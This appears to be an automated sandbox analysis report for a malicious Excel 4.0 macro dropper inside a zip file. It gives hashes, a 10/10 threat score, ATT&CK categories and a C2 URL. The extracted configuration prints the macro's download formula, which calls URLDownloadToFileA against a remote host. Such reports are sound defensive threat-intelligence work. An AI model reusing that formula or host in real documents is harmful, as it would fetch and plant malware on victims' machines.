ac8262129a41f40bc642673fb60c24dcad4da5af12f398cbb41b67ff337ed5e1 | Triage

Sharing

General

Target

attached (63).zip
Size

11KB
Sample

210306-q86wxdvt2j
MD5

3c7575af64aa28a479b84de660b0d7f1
SHA1

ba2d2425d42787d7f9cfda785b707a68ce1a5e9d
SHA256

ac8262129a41f40bc642673fb60c24dcad4da5af12f398cbb41b67ff337ed5e1
SHA512

e02c7c24b04a5a8121e53ecd68aa6d1875c72e3ab5fb7190bdd315501ff014a08f0a37828979db2d61c6aca705e755154ed74e277d603e1f4cf5db321d861433

Score

10^/10

macro xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://ttj10qrrqx03kdts.com/inda.xls

Attributes

formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://ttj10qrrqx03kdts.com/inda.xls","..\fkruf.djr",0)

Extracted

Language

xlm4.0

Source

URLs

xlm40.dropper

http://ttj10qrrqx03kdts.com/inda.xls

Targets

- Target
  
  document-1557878943.xls
- Size
  
  39KB
- MD5
  
  859443784b857b985a2656c8ef8b585e
- SHA1
  
  46c83701b4204d1a1a7acac46aa81eb200f89b6e
- SHA256
  
  1b6fba5ecc7453ff21ea5162ec52e5af180de5b14d4f7ac7f976d56f93c5e84a
- SHA512
  
  9684ae131110bcac95618e605dc3579d766c855f990f54129059d8f441e4b9bcc818faf8b5805af01894361b96bf990d5965d96c61283b15c431abeea3f8554f
Score

10^/10
- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
behavioral1 behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

Credential Access

Discovery

Query Registry

System Information Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks

static1

behavioral1

behavioral2